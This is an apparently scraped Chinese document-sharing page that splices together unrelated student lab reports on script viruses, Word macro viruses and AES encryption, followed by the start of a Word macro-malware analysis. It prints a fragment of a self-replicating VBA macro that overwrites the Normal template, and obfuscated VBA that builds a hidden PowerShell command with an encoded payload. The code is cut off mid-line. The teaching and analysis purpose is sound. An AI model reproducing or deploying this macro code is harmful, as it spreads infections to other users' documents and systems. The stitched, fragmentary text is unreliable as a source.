实验三 脚本病毒和宏病毒分析

合集下载

(完整word版)脚本病毒实验(word文档良心出品)

(完整word版)脚本病毒实验(word文档良心出品)

脚本病毒实验【实验内容】脚本实验平台根据用户指定需求,自动生成脚本病毒代码,并在界面中呈现给用户,用户可以编辑代码,运行脚本,观察脚本运行现象,并分析脚本实现,脚本实验具体内容包括:(1)复制病毒副本到系统文件夹;(2)复制病毒副本到启动菜单;(3)禁止“运行”菜单;(4)禁止“关闭系统”菜单;(5)禁止显示桌面所有图标;(6)禁止“任务栏”和“开始”;(7)禁止“控制面板”;(8)修改“IE”默认页。

【实验原理】脚本病毒通常是JavaScript或VBScript等语言编写的恶意代码,一般带有广告性质,会修改IE首页、修改注册表等信息,对用户计算机造成破坏。

通过网页进行的传播的病毒较为典型,脚本病毒还会有如下前缀:VBS、JS(表明是何种脚本编写的),如欢乐时光(VBS.Happytime)、十四日(Js.Fortnight.c.s)、红色代码(Script.Redlof)等。

典型的脚本病毒通过邮件方式进行传播,如图2.4.1-1所示的代码为病毒通过向Outlook 中的地址簿中联系人地址发送邮件,从而将病毒代码以附件的形式广泛传播到互联网其它主机。

图2.4.1-1【实验环境】Windows实验台【实验步骤】打开Windows实验台,点击桌面“病毒实验”,选择“脚本病毒实验”,进入其实施面板,如图2.4.1-2所示。

图2.4.1-2一、脚本病毒代码分析和查看分别选择相应的脚本文件,学生用户即可查看脚本病毒代码。

在界面左侧功能选择区选择实验名称,用户在界面右侧将会看到该脚本病毒的全部代码。

如图2.4.1-3所示。

图2.4.1-3学生用户如需要编辑脚本病毒代码,用户在界面右侧将会看到该脚本病毒的全部代码,在此基础上编辑代码,将会生成用户自定义的脚本病毒,点击“保存脚本”按钮将把编辑好的脚本文件永久保存,如果编辑过程出现错误或者异常,点击“重置脚本”将恢复最初的脚本代码。

实验进行前,要先点击“初始化病毒工具”按钮,对其实验所需的工具进行初始化;在实验过程中,如果所需的工具被杀毒软件查杀,要再次点击“初始化病毒工具”按钮,对工具重新进行初始化,以便实验顺利进行。

宏病毒原理及案例分析

宏病毒原理及案例分析

宏病毒原理及案例分析屈立成4114005088什么是宏?所谓宏,就是一些命令组织在一起,作为一个单独命令完成一个特定任务。

Microsoft Word中对宏定义为:“宏就是能组织到一起作为一独立的命令使用的一系列word命令,它能使日常工作变得更容易”。

Word使用宏语言Word_Basic将宏作为一系列指令来编写。

Word宏病毒是一些制作病毒的专业人员利用Microsoft Word的开放性即word中提供的Word BASIC编程接口,专门制作的一个或多个具有病毒特点的宏的集合,这种病毒宏的集合影响到计算机的使用,并能通过.DOC文档及.DOT 模板进行自我复制及传播。

宏可使任务自动化,如果在Word中重复进行某项工作,可用宏使其自动执行。

宏是将一系列的Word命令和指令结合在一起,形成一个命令,以实现任务执行的自动化。

用户可创建并执行一个宏,以替代人工进行一系列费时而重复的Word操作。

事实上,它是一个自定义命令,用来完成所需任务。

宏的一些典型应用如:加速日常编辑和格式设置、组合多个命令、使对话框中的选项更易于访问、使一系列复杂的任务自动执行等。

Word 提供了两种创建宏的方法:宏录制器和Visual Basic 编辑器。

宏录制器可帮助用户开始创建宏。

Word 在VBA 编程语言中把宏录制为一系列的Word 命令。

可在Visual Basic 编辑器中打开已录制的宏,修改其中的指令。

也可用Visual Basic 编辑器创建包括Visual Basic 指令的非常灵活和强有力的宏,这些指令无法采用录制的方式。

VBAVisual Basic for Applications(VBA)是Visual Basic的一种宏语言,是微软开发出来在其桌面应用程序中执行通用的自动化任务的编程语言。

主要能用来扩展Windows的应用程式功能,特别是Microsoft Office软件。

也可说是一种应用程式视觉化的Basic 脚本。

计算机宏病毒分析及清除试验报告

计算机宏病毒分析及清除试验报告
Set host = NormalTemplate.VBProject.VBComponents(1).CodeModule
If ThisDocument = NormalTemplate Then
Set host = ActiveDocument.VBProject.VBComponents(1).CodeModule
End If
With host
If .Lines(1, 1) <> "'Micro-Virus" Then
.DeleteLines 1, .CountOfLines
.InsertLines 1, ourcodemodule.Lines(1, 100)
.ReplaceLine 2, "Sub Document_Close()"
Sub Document_Open()
On Error Resume Next
Application.DisplayStatusBar = False
Options.SaveNormalPrompt = False
Set ourcodemodule = ThisDocument.VBProject.VBComponents(1).CodeModule
实验报告
实验时间
2016年11月23日
实验地点
软件工程实验室
实验名称
计算机宏病毒分析及清除
实验目的:1、了解“宏病毒”机理;
2、掌握清除宏病毒的方法;
3、掌握采用“宏”和脚本语言进行编程的技术。
实验平台:1、Windows 2000/2003/XP或更高级别的Windows操作系统;
2、Office Word 2000/2003等字处理软件。

网络安全实验报告

网络安全实验报告
if ((fpr=fopen(filename1,"rb"))==NULL)
{
printf("Cannot open this file\n");
return;
}
if ((fpw=fopen(filename2,"wb+"))==NULL)
{
printf("Cannot open this file\n");
软件:vc6.0;
实验主要步骤:
(1)完善AES加密、解密算法
(2)分析软件的执行效率即每秒钟加密的字节数
(3)给出改进意见
1.源程序;
//mainpro.cpp
//This modules is the main program;
//author:HJJD
//2008-11-25
#include "stdio.h"
for(i=0;i<=4*NB-1;i++) t2[i]=state[i%4][i/4];
blockxor(t2,v1,4*NB);
t3=t1;t1=v1;v1=t3;
fgetc(fpr);
if(!feof(fpr)) {fwrite(t2,1,4*NB,fpw);fseek(fpr,-1,1);}
return;
}
printf("Please input your key no more than %d char!\n",4*NK);
scanf("%s",userKey);
for(i=0;i<4*NK;i++) cipherkey[i]=userKey[i];

实验3 宏病毒

实验3  宏病毒

XI`AN TECHNOLOGICAL UNIVERSITY 实验报告一.实验目的1.理解WORD宏病毒的感染方式2.理解WORD宏病毒的工作原理3.掌握WORD宏病毒的杀毒方法二.实验原理WORD的文件建立是通过模板来创建的,模板是为了形成最终文档而提供的特殊文档,模板可以包括以下几个元素:菜单、宏、格式(如备忘录)等。

模板是文本、图形和格式编排的蓝图,对于某一类型的所有文档来说,文本、图像和格式编排都是类似的。

WORD提供了几种常见文档类型的模板,如备忘录、报告和商务信件。

你可以直接使用模板来创建新文档,或者加以修改,也可以创建自己的模板。

一般情况下,WORD自动将新文档基于缺省的公用模板NORMAL.DOT。

由此可以看出,模板在建立整个文档中起的作用是作为基类,文档继承模板的属性,包括宏、菜单、格式等。

另外,WORD还提供强大的宏功能。

宏是能组织到一起作为一个独立命令使用的一系列WORD命令,它能使日常工作变得更容易。

在WORD启动时,会自动加载NORMAL.DOT模板,以及它们所包含的宏。

您可以为宏指定特殊的名称,使其变为自动宏,以便在执行某一操作时,如:启动WORD或打开文档,就自动执行具有特殊命名的宏。

同其他宏一样,你可以将自动宏定义在一个共用模板上,也可以将其定义在一个特定模板上。

宏病毒主要寄生在以下3个宏中:AUTOOPEN、AUTONEW、AUTOCLOSE。

带病毒文档打开时,将病毒传染给NORMAL.DOT公用模板中,再由公用模板传染给所有其它正常的文档。

二.MOTHERSDAYVIRUS病毒感染机制MOTHERSDAYVIRUS宏病毒感染WORD文档和NORMAL.DOT文档。

被感染的WORD文档打开时或关闭时会首先弹出一个对话框,对话框关闭后再将控制权转移给正常的WORD文档执行。

MOTHERSDAYVIRUS使用DOCUMENT_OPEN宏(文档打开时执行)感染NORMAL.DOT,使用AUTOCLOSE自动宏感染其它文档。

计算机病毒实验

计算机病毒实验

计算机病毒实验报告一、实验目的(1)掌握常见几种病毒的基本原理(2)掌握清除病毒的方法(3)学会使用几种常见病毒进行基本编程的技术二、实验内容分别用PE病毒,欢乐时光脚本病毒,梅丽莎宏病毒,台湾宏病毒,万花谷脚本病毒,网络炸弹脚本病毒进行感染和病毒清除实验。

三、实验环境信息安全综合实验系统操作系统:WINDOWS2000JDK版本:Java Standard Edition 以上数据库:Mysql开发语言:JSPWeb服务器:TomacatOffice版本:MS office2000/2003四、实验结果1、网络炸弹(1)实验原理网页恶意代码确切的讲是一段黑客破坏代码程序,它内嵌在网页中,当用户在不知情的情况下打开含有病毒的网页时,病毒就会发作。

这种病毒代码镶嵌技术的原理并不复杂,所以会被很多怀不良企图者利用,使非常多的用户遭受损失。

“网络炸弹”是一种网页恶意代码,可以无限次得弹出固定窗口来达到侵占客户机系统资源,最终导致客户端死机的结果。

(2)结果演示1、修改IE的安全级别图1 修改IE安全级别2、修改注册表的安全设置图2 修改IE安全设置3、网络炸弹感染图3 网络炸弹感染4、网络炸弹源码图4 网络炸弹源码2、万花谷脚本病毒(1)实验原理脚本病毒(俗称“万花谷”病毒)实际上是一个含有恶意脚本代码的网页文件,其脚本代码具有恶意破坏能力,但并不含有传播性。

实验病毒为模仿它所写成的类“万花谷”病毒,减轻了病毒危害。

(2)结果演示1、修改IE的安全级别2、万花谷病毒感染图5 万花谷病毒感染-1图6 万花谷病毒感染-2图7 万花谷病毒感染-3图8 万花谷病毒源码3、欢乐时光脚本病毒(1)实验原理病毒程序嵌入在实验系统页面的脚本中,但受到界面脚本的控制与调用,实现通过用户的界面操作来触发病毒的感染,加解密和杀毒脚本,并有不同的操作引导三项实验的不同结果。

(2)结果演示1、修改IE安全级别2、病毒感染图9 欢乐时光病毒感染4、梅丽莎宏病毒(1)实验原理美丽莎宏病毒实际上是一个含有恶意代码的Word自动宏,其代码具有恶意传播繁殖能力,能够造成网络邮件风暴,造成邮件服务器瘫痪。

宏病毒实验报告

宏病毒实验报告

宏病毒实验报告一、实验目的本次实验旨在深入了解宏病毒的工作原理、传播方式以及其对计算机系统可能造成的危害,并通过实际操作和观察,探索有效的防范和清除策略。

二、实验环境1、操作系统:Windows 10 专业版2、办公软件:Microsoft Office 20193、杀毒软件:_____杀毒软件三、实验原理宏病毒是一种寄存在文档或模板的宏中的计算机病毒。

当打开包含宏病毒的文档时,宏病毒会被自动激活,并执行其中的恶意代码。

宏病毒通常利用 Office 软件中的宏功能来实现自我复制、传播和破坏操作。

四、实验步骤1、准备带有宏病毒的测试文档从网络上获取已知的含有宏病毒的示例文档。

对获取的文档进行备份,以防对实验环境造成不可恢复的破坏。

2、观察宏病毒的激活过程打开带有宏病毒的文档。

留意弹出的警告提示,记录相关信息。

3、分析宏病毒的行为观察文档中的内容是否被篡改。

检查计算机系统的性能是否受到影响,如 CPU 使用率、内存占用等。

4、尝试清除宏病毒使用安装的杀毒软件进行扫描和清除。

手动删除相关的宏代码。

五、实验结果与分析1、宏病毒激活情况打开测试文档时,Office 软件弹出了宏安全警告,但仍可以选择启用宏。

一旦启用宏,病毒立即开始执行恶意操作。

2、宏病毒的行为表现文档中的部分文本被修改,格式变得混乱。

CPU 使用率短时间内飙升,系统运行变得卡顿。

3、清除效果杀毒软件能够检测到宏病毒,并成功清除大部分感染,但仍有部分残留。

手动删除宏代码后,文档恢复正常,系统性能也逐渐恢复。

六、实验结论1、宏病毒具有较强的隐蔽性和破坏性,能够在用户不知情的情况下对文档和系统造成损害。

2、办公软件的宏安全设置对于防范宏病毒至关重要,用户应保持较高的安全意识,不轻易启用来源不明的宏。

3、杀毒软件在宏病毒的清除方面起到了一定的作用,但仍需不断更新病毒库和优化清除算法,以应对不断变化的宏病毒威胁。

4、定期备份重要的文档和数据是防范宏病毒造成严重损失的有效措施。

计算机病毒实验之宏病毒

计算机病毒实验之宏病毒

计算机病毒实验报告实验3.2 台湾No.1宏病毒3.2 台湾No.1宏病毒3.2.1 实验目的了解台湾No.1宏病毒的基本概念实验自己的台湾No.1宏病毒3.2.2 实验原理台湾No.1宏病毒实际上是一个含有恶意代码的Word自动宏,其代码主要是造成恶作剧,并且有可能使用户计算机因为使用资源枯竭而瘫痪。

3.2.3 实验预备知识点】什么是Word宏对VBA语言有一定的了解3.2.4 实验环境操作系统:WINDOWS2000JDK版本:Java Standard Edition 1.4.0以上数据库:MysqlWeb服务器:TomacatOffice版本:MS office2000/20033.2.5 实验步骤打开“信息安全综合实验系统” 在右上角选择“实验导航”双击“病毒教学实验系统”进入病毒教学实验系统登录面界,输入用户名和密码。

(注意:实验前先关闭所有杀毒软件。

)1.病毒感染实验由于该病毒特征码明显,因此请首先将病毒防火墙关闭,将系统时间调整到13日。

进入病毒防护教学实验后,点击左侧的“台湾N0.1宏病毒”,然后在点击下面的“病毒感染实验”,要根据要求和提示操作配置客户端的邮件地址,如下图3-2-1所示。

根据提示下载提供的台湾No.1病毒,亲自运行并记录自己的实验报告。

图3-2-1 病毒样本下载页面2.病毒代码分析进入病毒防护教学实验后,点击左侧的“台湾N0.1宏病毒”,然后在点击下面的“病毒代码分析”,可以分析页面中的台湾No.1病毒源代码,根据相关代码分析,填写页面中空白的参数,点击确定系统将自动生成代码。

新建一个word文档作为自己编写的该病毒文件,然后把生成的代码复制并粘帖至Word自带的VBA编译工具中,可以参照美丽莎宏病毒实验中的图4-3至4-4 。

将自行编制的病毒备份待用。

3.杀毒实验进入病毒防护教学实验后,点击左侧的“台湾N0.1宏病毒”,然后在点击下面的“杀毒实验”,学习病毒防范方法,根据系统页面上的提示,使用手动杀毒,并写入实验报告中。

宏与宏病毒实验

宏与宏病毒实验

宏与宏病毒实验1.宏病毒介绍宏病毒是一种寄存在文档或模板的宏中的计算机病毒。

一旦打开这样的文档,其中的宏就会被执行,于是宏病毒就会被激活,转移到计算机上,并驻留在Normal模板上。

从此以后,所有自动保存的文档都会“感染”上这种宏病毒,而且如果其他用户打开了感染病毒的文档,宏病毒又会转移到他的计算机上。

如果某个文档中包含了宏病毒,我们称此文档感染了宏病毒;如果 WORD系统中的模板包含了宏病毒,我们称WORD系统感染了宏病毒。

所谓宏是将一系列word命令和指令组合起来,形成一个命令,实现任务执行的自动化。

在word中有一类很实用的自动宏,会在特定事件发生时自动运行,word提供的5个自动宏是:(1) Autoexec宏在启动word时自动运行;(2) Autoexit宏在退出word时自动运行;(3) Autonew宏在新建文档时自动运行;(4) Autoopen宏在打开文档时自动运行;(5) Autoclose宏在关闭文档时自动运行;2.实验环境实验环境:windows2000及以上或windows XP所需软件:office word3.实验步骤(1)首先,依次选择“工具”-“宏”-“录制宏”菜单命令,接着弹出“录制宏”界面,如下图:接着在“宏名”下面的输入框中输入新宏的名称“yuan ”,接着单击“键盘”图标。

在弹出的“自定义键盘”界面中指定快捷键,比如ctrl+y ,单击左下角“指定”按钮后,再单击右下角的“关闭”按钮,回到”录制宏“界面。

这时单击”确定“按钮启动记录器。

接着,依次选择“插入“-”符号“菜单命令,弹出”符号“界面。

选择”符号“选项卡,在”符号“框中选择”¥“,单击”插入“按钮后再单击”关闭“按钮。

单击“停止录制“工具栏中的”停止录制“按钮。

以后,当需要插入字符“¥”的时候,只需要按下ctrl+y组合键。

(2) 给word文档加上通用的密码关闭word文档,当再次打开文档的时候,需要输入密码才能看到内容和修改。

宏病毒分析

宏病毒分析

宏病毒的原理
Word、Excel居多,较为相似 ������ 病毒进入word,代替正常宏 FileOpen、FileSave、FileSaveAs、FilePrint ������ 获得对文件交换的控制 ������ 当某项功能被调用时,相应的病毒宏会篡夺 控 制权,实施非法操作,包括传染操作、表现操
把文档转换成模版格式 ������ 把所有宏病毒复制到该文档 ������ 被转换成模版格式后的染毒文件无法转存 为 其他格式 ������ 含有自动宏的宏病毒被其他计算机的word 打 开的时候会自动感染该计算机 ������ 将感染每一个被打开的word文档 ������ 另外创建的新文档同样含有宏病毒
宏病毒的特征和行为


与操作系统病毒相似,宏病毒在感染时 增加了文件的大小。 如果你知道文档上一次被修改的大约时 间,你可以检查该文档的时间戳,看这 个文档最后一次被修改的时间。如果时 间戳比你记忆中的修改时间靠后,就可 能存在着病毒。
宏病毒感染的几种症状

在以前不含有宏的文件中出现了宏。 ������ 该应用程序将所有文件保存为模板。 ������ 该应用程序经常会提醒用户保存那 些 只是被查看了但没有被修改的文件。
宏病毒的原理
宏病毒的产生是利用了一些数据处理系统内置宏命令编 程语言的特性而形成的。这些数据处理系统内置宏编成 语言的存在使得宏病毒有可乘之机,病毒可以把特定的 宏命令代码附加在制定文件上,通过文件的打开或关闭 来获得控制权,实现宏命令在不同文件之间的共享和传 递,在未经使用者许可的情况下获取某种控制权,达到 传染的目的。

宏病毒的破坏表现



对用户进行骚扰 一种宏病毒在每月13日发作显示出5个数 字连乘的心算数学题 有些病毒使文档打印时出现乱码 有些病毒删除帮助文件或删除硬盘所有 文件 对word、excel运行的破坏 对系统的破坏,basic能够调用系统命令

宏病毒分析

宏病毒分析

宏病毒分析一、宏病毒简介宏,就是软件设计者为了在使用软件工作时,避免一再的重复相同的动作而设计出来的一种工具。

它利用简单的语法,把常用的动作写成宏,当再工作时,就可以直接利用事先写好的宏自动运行,去完成某项特定的任务,而不必再重复相同的动作。

宏病毒是一种寄存在文档或模板的宏中计算机病毒。

一旦打开这样的文档,其中的宏就会被执行,于是宏病毒就会被激活,转移到计算机上,并驻留在Normal模板上。

从此以后所以自动保存的文档都会“感染”上这种宏病毒,而且如果其他用户打开了感染病毒的文档,宏病毒又会转移到他的计算机上。

宏病毒正式利用了在Word和其他办公软件如Excel中所具有的宏特征进行病毒感染,本质上,它是嵌入到字处理文档或其他类型文件中的一段可执行代码。

二、宏病毒特点(1)、宏病毒的主要破坏○1.对WORD运行的破坏是:不能正常打印;封闭或改变文件存储路径;将文件改名;乱复制文件;封闭有关菜单;文件无法正常编辑。

○2.对系统的破坏是:Word Basic语言能够调用系统命令,造成破坏。

(2)、宏病毒隐蔽性强,传播迅速,危害严重,难以防治与感染普通.EXE或.COM文件的病毒相比,Word宏病毒具有隐蔽性强,传播迅速,危害严重,难以治愈等特点。

(3)、宏病毒具体表现○1.隐蔽性强由于人们忽视了在传递一个文档时也会有传播病毒的机会。

○2.毒传播迅速因为办公数据的交流要比拷贝.EXE文件更加经常和频繁,如果说扼制盗版可以减少普通.EXE或.COM病毒传播的话,那么这一招对Word病毒将束手元策。

○3.危害严重无数的DOC文件从上级机关传播到基层,基层又上报到上级机关,从各个单位的办公室到工作者的家庭,到出版部门的计算机系统。

于是,便存在这样一种可能,当成千上万的计算机系统在传播和复制这些数据以及文档文件的同时,也在忠实地传播和复制这些病毒。

由于该病毒能跨越多种平台,并且针对数据文档进行破坏,因此具有极大的危害性,该病毒在公司通过内联网相互进行文档传送时,迅速蔓延,往往很快就能使公司的机器全部染上病毒。

【宏病毒】Word宏病毒简单分析

【宏病毒】Word宏病毒简单分析

【宏病毒】Word宏病毒简单分析前⾔最近对Office系列宏病毒⽐较感兴趣,⽹上找了⼀个Word样本练练⼿,宏病毒常⽤套路⼀般都是利⽤PowerShell从服务器上下载PE⽂件执⾏,或者数据流中内嵌PE⽂件借助RTF释放执⾏。

所以分析宏病毒⼀般都⽐较简单,查看VBA代码基本就能知道病毒执⾏的内容,但是如果代码中的函数、变量、字符串等都经过混淆,分析起来难度就会提⾼。

详细分析诱导⽤户启⽤宏代码如果启⽤内容,宏代码就会执⾏,我们先看下⽂档中的数据流。

从"DMSojZquJ"和"wAwJBjJQJ"数据流中DUMP下宏代码,代码经过严重混淆,我们从“AutoOpen”⼦程序开始分析。

1'Attribute VB_Name = "wAwJBjJQJ"2Function RTUHFOzsK()3 SSIhYOGKB = BBqMNPjSw4 bkspY = Mid("zYsMfzXjUkZcWdEGwAVSztCl", 12, 1)5 pGHmjw = bkspY6 THZbsWKtF = GApwOicZH7 VEbORpJELT = Mid("w ULjXwAKAb", 2, 2)8 siCAq = VEbORpJELT9 HPhRfOHnm = TOvllapZt10 jpucp = Mid("dwOtbdJnhnCwfmAwZ qUwQ", 18, 2)11 aLAikTZzXH = jpucp12 fqalXfJAK = LCnHkoIcD13 VuuwVO = Mid("sXFWPUriJfKTpqQrVtOvwpYvPcmRpGfQk", 26, 2)14 FItfpaapu = VuuwVO15 OBbLUEjqi = KUOOIoowi16 FVvtMEG = Mid("HdAFDcAsATviDfWzFFzpaz pXJcWfwf", 23, 2)17 ajJRwS = FVvtMEG18 jVrCIfDvl = zLiGcJXbX19 ZrAYDPTq = Mid("iHOvIROFpzkqDsbh OWUdhlpCiwZMTtrODJzmwsH", 17, 2)20 jiAGQiQw = ZrAYDPTq21 SUWWCjAwf = vzuwToFbG22 jmtkTTkrF = Mid("wYuqqVtGZiJmAXAhOSuPBlkv ZpEnSjLlFJZnGcc", 24, 2)23 GcmZjTwn = jmtkTTkrF24 LMtwHYSki = ADrFrhRWc25 NEiTwbDXjd = Mid("ffAMXNhHaz tNilfGXhcTPPsBKcvGidzFR", 11, 2)26 RjvFUJZEqEH = NEiTwbDXjd27 LKTKBJzHw = rAsqBBCLO28 riLqL = Mid("VYSzUNAfirLhNHuvTkkpqTYI NBTb", 25, 1)29 wjCNaFw = riLqL30 iVMwDRCAv = nqFMhzLtQ31 hCfFzWOivq = Mid("HRJzsdTznHRYYLErvnJSVjftUhUujlLVzZfA", 6, 1)32 NBOCDBCM = hCfFzWOivq33 nAKjzzabj = lKCqCjSmA34 bGAdVi = Mid("RMiPstNpOmmrqQf/wzkf", 16, 1)35 uFHPYHoifcS = bGAdVi36 PNGBIBOLR = tiTviHlPK37 BzbiCjnQqm = Mid("AikEQJtLfHomiYXDjK /fbjKtsWuJLaJzImkOi", 19, 2)38 IjUTlUqWHO = BzbiCjnQqm39 EuXMYbiQq = tznZtuwvj40 rZKmALU = Mid("ijpGMkvqVjf zj", 12, 2)41 uGUWvBHvsD = rZKmALU42 RTUHFOzsK = FItfpaapu + NBOCDBCM + IjUTlUqWHO + GcmZjTwn + uFHPYHoifcS + pGHmjw + jiAGQiQw + RjvFUJZEqEH + siCAq + uGUWvBHvsD + ajJRwS + aLAikTZzXH + wjCNaFw43End Function44Sub AutoOpen()45 KlsJVlijz46End Sub1'Attribute VB_Name = "DMSojZquJ"2Function KlsJVlijz()3 KRwZOZiSb = jMiOqzLkc4 TzurouRwtt = Mid("juDEAMQA2AGIANQA5LfDuHPHXHoVdEQfRC", 3, 15)5 iKnPNTjHYUN = TzurouRwtt6 TsfRjzdCc = wGUKHjjwm7 SAIGYDAjD = Mid("Ur8BJGqnnB5Yulset %cDpiTrLVN%=wers&&set %SuZmiriSa%=JwsADfCTs&&set %KlsJVlijz%=po&&set %qfSAwAXEM%=MrqzTiJDT&&set %PqjuFnVOr%=hell&&set %SqYwAARBW%=VcQFWjpkv&&!%KlsJVlijz%!8 iBSRmkhEj = SAIGYDAjD9 XtczUhZho = sGlQtlEVs10 HdFRsCmu = Mid("zQDZhA3kAOQB7ADEAMQA2AGIAMQAwADUAYgAxADEAMQA6ADEAMQAwAFkANAA2AH4AMQAwADAMuwW3nHiNYrXXhKvuQhjarIPjtM", 8, 65)11 JZJjMfIbBG = HdFRsCmu12 PthzvLzhL = GZEufrNor13 aJFENXB = Mid("2iwApzVhvrZAEkAMQAxADEAegA0ADYAbQAxADEAMAAmADEAMAA4AH4ANAA3AHsAMQAxADYAYgA2ADYAJgAxADAAMgB+ADQANwBZADMAOQB+ADQANgB6ADgAMwBiADEAMQAyAH4AMQAwADgAWQAxAD14 TjXFztBK = aJFENXB15 zUYzrCIlv = qfMjGmrTF16 bEHOc = Mid("LnMwj8vivvwTnBW06hAzADIASQAxADEAMABZADEAMAAxACEAMQAxADkAJgA0ADUAJgAxADEAMQB6ADkAHc", 19, 62)17 AcOZjKGHd = bEHOc18 EYzRCmWTI = kzbtDFuEB19 KtWFTJiUI = Mid("flGAbQ8jdVC6Iw5wGU3kFwCpYhBY7ADkAOAA6ADEAMAA2AG0AMQAwADXlAW41AL0oV", 29, 27)20 RkSMsXZmbbj = KtWFTJiUI21 TSBfqKPHC = wXTSDLmIQ22 iBobiw = Mid("QSw3OIaCMAwAHsAMQAxADAAOgAxADAAMQAmADEAMQA2AGIANAA2ACEAMQAwADAAOgAxADAAMQBiADQANwAmADEAMQA0AEkANAA3AH4ANAA0AHoAMQAwADQAbQAxADEANgBZADEAMQA2ACYAMQAxA23 mvotcU = iBobiw24 uiSlbYuXn = TwcHoBkXB25 iaBTlajaUKt = Mid("znY7zKn7hBOVIFz6X%cDpiTrLVN%!!%PqjuFnVOr%! -e LgAgACgAKAB2AEEAUgBpAEEAYgBMAGUAIAAnACoAbQBEAFIAKgAnACkALgBuAGEAbQBFAFsAMwAsADEAMQAsADIAXQAtAEoATwBJAG4AJwAnACkA26 XvLAfRK = iaBTlajaUKt27 EZhmBvkXw = pStPHvpAV28 wLTmWqsTK = Mid("FfAHsAMQAwADUAYgAxADEANQBZADEAMQA2AH4AMQAxADQAbQTLWzcjuipSiEo", 3, 46)29 orwEYmMBR = wLTmWqsTK30 jhqckTXvK = ZriRhfKhi31 wdpalVvA = Mid("I6iEVXN1GLwpHCz8Ijwm06KbVIuAJgAxADAAMQBJADQANwAhADcAOAB7ADgAOQAhADEAMAA3AEkAOAAzAG0AMQAwADIAJgA0ADcAegA0ADQAJgAxADAANAB6ADEAMQA2AH4AMQAxADYAIQAxADEAMgB7AD32 nGmuz = wdpalVvA33 iHhXBDcFF = tDohRofBp34 IWIok = Mid("RjADIAJgA0ADMAbQAzADIAYgNG9GurhlHcLP2Co6oWzLFSwmkhv4ldioX", 3, 22)35 TBNjdzzzh = IWIok36 KbpOPFkKj = NXkOFaMGs37 AsoLI = Mid("fSiIEDACYAMwA2AG0AMQAxADQAbQA5ADcAegAxADEAMABiADEAMAAwACYAMQAxADEAegAxADAAOQAhADMAMgBJADYhjj3jjAuppqRGqKrh1T", 7, 82)38 FRdXUFElRa = AsoLI39 oLjmAfOds = VsZuljqAF40 ISYEi = Mid("BVjP8jiqhGziNiDAAOQBiADQANwBJADgAMwBiADEAMAA3ACYANgA1ADoAOAA1AFkANAA3AFkANAA0ACYAMQAwADQAegAxADEANgBiADEAMQA2ACYAMQAxADIAewA1ADgAJgA0ADcAegA0ADcAOgAxADAAOQBtA41 fizsQ = ISYEi42 tUscmqXOh = UfwOUKvrp43 mnbclQddw = Mid("iPPaU89tkLifQBor34HASQB+AHoAJwAgACkAIAB8ACAAJQB7ACgAIABbAEkAbgB0AF0AJABfAC0AYQBTACAAWwBDAEgAYQByAF0AKQdQsE", 20, 83)44 cslql = mnbclQddw45 JXbJzlNOS = GTmEXEUTm46 GbEiUOiVXw = Mid("ziITYGiIamHpoZHgB+ADgAMwB7ADEAM1t26K9TjQqMzHzEYiu", 16, 16)47 YhuVfBw = GbEiUOiVXw48 AMYpPlzuw = tHXOwuqjd49 nwTYnBKp = Mid("I3DEAMAAx6EkAh4h7va", 3, 7)50 zwsMjwQJTv = nwTYnBKp51 djUGOYYRv = vPHtuBYvi52 WrfmRXK = Mid("Jmcs93jA5rYAMQBJADMAMgB6ADEAMQAwACYAMQAwADEAIQAxADEAOQAmADQANQAmADEAMQAxAH4AOQA4AFkAMQAwADYAYgAxADAAMQAhADkAOQBtADEAMQA2AHoAMwAyAEkAMQAxADQAegA5ADc53 awBiLS = WrfmRXK54 QTIqMFnTG = urVrNrbqk55 fwizQHrrKMl = Mid("7ZNCDjkd16F3vJwZADEAMAAxAG0AMQAwADkAYgA0ADYASQA3ADgAWQAxADAAMQA6ADEAMQA2AGIANAA2AGIAOAA3AH4AMQAwADEASQA5ADgAbQA2ADcAYgAxADAAOABJADEAMAA1ADoAMQAwADE56 kzLPNEjwRpi = fwizQHrrKMl57 StzAQwpCi = qzNWqCPaM58 HYhqTVjz = Mid("NlUNOMQB7ADQANwAhADEAMQA4AHsAOAA3AG0AMQAwADMAOgA0ADcAbQA0ADQAJgAxADAANAAhADEAMQA2AG0AMQAxADYAewAxADEAMgBiADUAOAAhADQANwBiADQANwAmADkANwB6ADEAMAAwAF59 OXrPUEbnvR = HYhqTVjz60 UnXOTvRiZ = ZDBQRDQGC61 aOmzViYRI = Mid("q4zoiVLRd4XVFkAFkAOQA5ACEAOQA3AHoAMQAxADYAfgA5ADkAfgAxADAANABiADEAMgAzACEAMQAxADkAfgAxADEAI71o4", 15, 76)62 KIwkY = aOmzViYRI63 jQCKAJbwT = tXBTbniGD64 mTTdkG = Mid("09MYoVDXOQBiADEAMgAxAH4AOQA4AFkAMQAxADcAewAxADIAMQB+ADEAMAA1AG0AMQAxADAAegAxADAAMwBJADkANwB6ADEAMAAzAHoAMQAwADEAOgAxADEAMAA6ADEAMQA2ACYANAA2AG0AOQA565 CPOtaunKXFw = mTTdkG66 MDaCimYPz = cahKFjzjJ67 jENmKtocosG = Mid("Om2EAOgA5ADkAbQAxADEANgBiADMAMgBiADQANQAhADYANwBJADEAMQAxACYAMQAwADkAbQA3ADkAOgA5ADgAfgAxADAANgBiADEAMAAxAFkAOQA5AEkAMQAxADYAbQAzADIAfgA4ADcAYgA4ADMA68 IAFUul = jENmKtocosG69 KKmNnWbYG = XGbNmLAEC70 wwuaTvRloii = Mid("rizBpdohTDQANwBiADQANwAmADEAMAAxAFkAMQAwADAAYgAxADEAMQB7ADEAMQqMh4QsW0tSwB7NpOpYfO", 10, 53)71 muHlMzvW = wwuaTvRloii72 cihQlkKwW = mjSSTsdUv73 NkhKkqUcZzS = Mid("3sTuj9MB568wAFkANgA4AHoAMQAxADEASQAxADEAOQAhADEAMQAwACEAMQAwADgAWQAxADEAMQA6ADkANwBiADEAMAAwAFkANwAwACYAMQAwADUAOgAxADAAOAAhADEAMAAxAEkANAAwAG0A74 wJLOSQhR = NkhKkqUcZzS75 QzQDbKjBI = XPoWJBjXF76 fYzIS = Mid("t8Qv5AEmsBzcKQuRLtPfWP2haoJiOWTEJKWZADUAYgAxADEAMABZADMAMgAmADMANgA6ADEAMQA3AH4AMQAxADQAfgAxADAAOAB7ADEAMQA1ACYANAAxAFkAMQAyADMAYgAxADEANgBJADEAMQA0AH4AM77 bbvLjLAvSJ = fYzIS78 ctZCDozpo = oFnijRPjE79 ZXRkXlUKciC = Mid("K3jBHqR0qD19138PwR5IMndSACWcuccASQAxADAAMwB+ADEAMAAxAHoAMQAxADAAfgAxADEANgAmADEAMQA1AEkAMQAwADUAOgAxADEAMABJADkANwBtADzEX", 31, 88)80 LPwcEG = ZXRkXlUKciC81 mYCWkjbmj = iPZQlvnBa82 